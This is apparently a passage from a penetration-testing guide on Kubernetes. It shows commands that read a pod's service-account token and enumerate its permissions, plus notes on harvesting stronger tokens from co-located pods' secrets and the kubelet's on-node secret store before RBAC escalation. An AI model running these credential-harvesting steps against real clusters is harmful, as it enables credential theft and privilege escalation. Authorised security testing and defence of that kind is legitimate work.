The default service-account token is the first identity, but rarely the best. Test what it can do, then look for stronger tokens in other mounted secrets, in the kubelet's on-node secret store, and in environment or config.
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://kubernetes.default.svc
alias k="kubectl --server=$APISERVER --token=$TOKEN --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"
# What can this identity do?
k auth can-i --list
k auth can-i create pods
Exploitation notes#
auth can-i --listis the fastest map of a token's power; look forcreate pods,get secrets,escalate,impersonate, and wildcard verbs.- More privileged tokens hide in mounted secrets of co-located pods and, after a node foothold, in
/var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/. - Pick the strongest identity before acting; the next steps (RBAC escalation, pod creation) depend on it.